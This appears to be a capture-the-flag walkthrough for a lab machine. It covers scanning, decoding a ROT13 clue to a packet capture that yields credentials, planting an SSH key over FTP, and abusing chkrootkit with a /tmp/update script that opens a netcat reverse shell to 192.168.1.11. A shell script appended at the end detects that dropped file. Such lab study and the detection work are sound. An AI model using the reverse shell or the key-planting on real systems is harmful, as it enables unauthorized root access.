We start by scanning the host with nmap -A -T4 -p- 192.168.1.9 -vv

Running dirb against the host turned up some directories and a text file.

The text file contains the word nfubxn.cpncat, which makes no sense on its own, but if we run it through ROT13 (for example at https://rot13.com/) it decodes to ashoka.pcapng, a capture file we can view in Tshark or TCPDump, or pull the payloads out of with >> tcpick -C -yP -r ashoka.pcapng

Now we have a username ashoka and a password kautilya.

We create a .ssh folder on the host and transfer our authorized_keys from our own .ssh folder using the PUT command of the host's ftp service:
On the host (ftp session, inside the user's home directory):
mkdir .ssh
cd .ssh
On our machine:
ssh-keygen
cat id_rsa.pub > authorized_keys
cp authorized_keys /root/
On the host:
put authorized_keys
Now leave the ftp session and log in over ssh.

In the /tmp folder there is a log file; reading it tells us chkrootkit is running on the box, which we can exploit using:
echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444 >/tmp/f' >> update
chmod 777 update
./update
and catching the connection on your machine with nc -lvp 4444 (the listener port has to match the 4444 used in the update script).

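From the defender's side, the chkrootkit step above relies on an attacker being able to drop an executable file named update into /tmp for chkrootkit to pick up. The following check is an added example, not part of the original walkthrough: it reports whether such a file is present and how dangerous its permissions are, and the directory argument (defaulting to /tmp) is an assumption made so the check can be exercised against a scratch directory.

```shell
#!/bin/sh
# Added example (not from the walkthrough): detect the /tmp/update file that the
# chkrootkit abuse depends on. Directory argument is assumed/optional; it exists
# only so the check can be run against a scratch directory instead of /tmp.

# check_tmp_update [dir]
#   returns 0  -> no "update" file in dir
#   returns 1  -> "update" exists and is executable (chkrootkit would run it)
#   returns 2  -> "update" exists but is not executable (still worth reviewing)
check_tmp_update() {
    dir="${1:-/tmp}"
    target="$dir/update"
    [ -e "$target" ] || return 0

    # others-write bit is the 9th character of "ls -ld" output (e.g. -rwxrwxrwx)
    perms=$(ls -ld "$target" | cut -c1-10)
    ww=""
    case "$perms" in
        ????????w?) ww=" (world-writable)";;
    esac

    if [ -x "$target" ]; then
        echo "ALERT: executable $target present$ww"
        return 1
    fi
    echo "WARN: non-executable $target present$ww"
    return 2
}

# chkrootkit_scheduled: list cron locations that mention chkrootkit, so an
# admin can see whether a dropped /tmp/update would ever be executed as root.
chkrootkit_scheduled() {
    grep -ls chkrootkit /etc/crontab /etc/cron.d/* /etc/cron.daily/* 2>/dev/null
}

# Stand-alone usage: audit the real /tmp and report cron entries.
if [ "${1:-}" = "--run" ]; then
    check_tmp_update /tmp
    chkrootkit_scheduled
fi
```

Run it as a periodic job or from a configuration check; a non-zero return means /tmp/update needs to be looked at before the next scheduled chkrootkit run.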